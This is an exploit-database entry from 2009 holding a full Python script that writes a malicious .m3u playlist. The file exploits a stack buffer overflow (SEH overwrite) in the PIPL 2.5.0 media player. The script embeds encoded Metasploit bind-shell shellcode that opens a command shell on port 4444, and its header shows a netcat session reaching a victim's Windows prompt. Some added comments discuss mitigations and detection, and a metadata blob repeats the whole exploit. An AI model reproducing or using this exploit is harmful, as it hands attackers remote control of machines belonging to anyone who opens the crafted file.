ID 1337DAY-ID-8083
Type zdt
Reporter mr_me
Modified 2009-08-28T00:00:00
Description
Exploit for unknown platform in category local exploits
=================================================================
PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)
=================================================================
#!/usr/bin/python
#
#############################################################
# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH)
# Coded by: Steven Seeley aka mr_me
# Download: http://www.programmedintegration.com/files/pipl.exe
# Tested on Wind0ws XP sp3 & [email protected]
# SEH overwrite, just for kicks
# Surprise surprise m3u file ;) but no calc this time muhahaha
# ###########################################################
#
# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke :)
#
# [email protected]:~/exploits$ nc -v 192.168.0.6 4444
# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.0.6] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Owner\Desktop>
#
# Generator script (Python 2 syntax) for a malformed .m3u playlist aimed at the
# SEH-overwrite stack overflow in PIPL <= 2.5.0 named in the header above.
print "[+] Pipl 2.5.0 local exploit"
# Filler: 4108 bytes of 'A' placed ahead of the two 4-byte values below.
# NOTE(review): presumably the distance to the exception-handler record on the
# tested build; the page does not show how it was measured -- confirm.
bof="\x41" * 4108
# Four bytes: EB 06 (x86 short jump, +6) followed by two 0x90 bytes.
nsh="\xEB\x06\x90\x90"
# Hard-coded address 0x10010717 in little-endian order; the author's inline
# note attributes it to xaudio.dll.
# NOTE(review): a fixed in-module address only holds where that module loads
# at a predictable base and is not covered by SafeSEH; SafeSEH, SEHOP or ASLR
# on the module would presumably stop this record from being honoured -- confirm.
seh="\x17\x07\x01\x10" #xaudio.dll ppr
# 20 bytes of 0x90 padding placed in front of the payload.
nops="\x90" * 20
# Opaque encoded payload, embedded verbatim and not decoded by this script.
# Per the generator banner below it is a Metasploit win32_bind payload with
# LPORT=4444; the header transcript shows a connection to TCP 4444 returning a
# Windows command prompt.
# NOTE(review): for triage, an unexpected TCP 4444 listener owned by the media
# player process is the observable this banner implies -- verify on a lab host.
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com */
sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
# Concatenate the pieces in a fixed order: filler, 4-byte jump, 4-byte
# address, NOP padding, payload.
buff = bof + nsh + seh + nops + sc
# Write the result to mr_mes_miX.m3u in the current working directory. The file
# holds no playlist entries, only one unbroken run of more than 4 KB starting
# with repeated 'A' bytes, which makes a simple content check for mail or
# download scanning. The durable mitigation is a length check in the player's
# .m3u parser; the page names no fixed version.
f1 = open('mr_mes_miX.m3u','w');
f1.write(buff);
f1.close();
print "[+] mr_mes_miX.m3u file created successfully"
{"published": "2009-08-28T00:00:00", "id": "1337DAY-ID-8083", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category local exploits", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-02-19T19:35:32", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-19T19:35:32", "rev": 2}, "vulnersScore": 0.5}, "type": "zdt", "lastseen": "2018-02-19T19:35:32", "edition": 2, "title": "PIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)", "href": "https://0day.today/exploit/description/8083", "modified": "2009-08-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 43, "cvelist": [], "sourceHref": "https://0day.today/exploit/8083", "references": [], "reporter": "mr_me", "sourceData": "=================================================================\r\nPIPL <= 2.5.0 (.m3u File) Universal Buffer Overflow Exploit (SEH)\r\n=================================================================\r\n\r\n\r\n#!/usr/bin/python\r\n#\r\n#############################################################\r\n# PIPL <= 2.5.0 (.m3u File) Universal bof exploit (SEH)\r\n# Coded by: Steven Seeley aka mr_me \r\n# Download: http://www.programmedintegration.com/files/pipl.exe\r\n# Tested on Wind0ws XP sp3 & [email\u00a0protected]\r\n# SEH overwrite, just for kicks\r\n# Surprise surpise m3u file ;) but no calc this time muhahaha\r\n# ###########################################################\r\n#\r\n# Greetz to muts & team, Dr_IDE, HACK4LOVE, raWjaW and str0ke :) \r\n#\r\n# [email\u00a0protected]:~/exploits$ nc -v 192.168.0.6 4444\r\n# 192.168.0.6: inverse host lookup failed: Unknown server error : Connection timed out\r\n# (UNKNOWN) [192.168.0.6] 4444 (?) 
open\r\n# Microsoft Windows XP [Version 5.1.2600]\r\n# (C) Copyright 1985-2001 Microsoft Corp.\r\n#\r\n# C:\\Documents and Settings\\Owner\\Desktop> \r\n#\r\n\r\nprint \"[+] Pipl 2.5.0 local exploit\"\r\n\r\nbof=\"\\x41\" * 4108\r\nnsh=\"\\xEB\\x06\\x90\\x90\"\r\nseh=\"\\x17\\x07\\x01\\x10\" #xaudio.dll ppr\r\nnops=\"\\x90\" * 20\r\n\r\n# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum \r\n# http://metasploit.com */\r\n\r\nsc = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x
50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x4
2\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\")\r\n\r\nbuff = bof + nsh + seh + nops + sc\r\n\r\nf1 = open('mr_mes_miX.m3u','w');\r\nf1.write(buff);\r\nf1.close();\r\n\r\nprint \"[+] mr_mes_miX.m3u file created successfully\"\r\n\r\n\r\n\n# 0day.today [2018-02-19] #"}
{}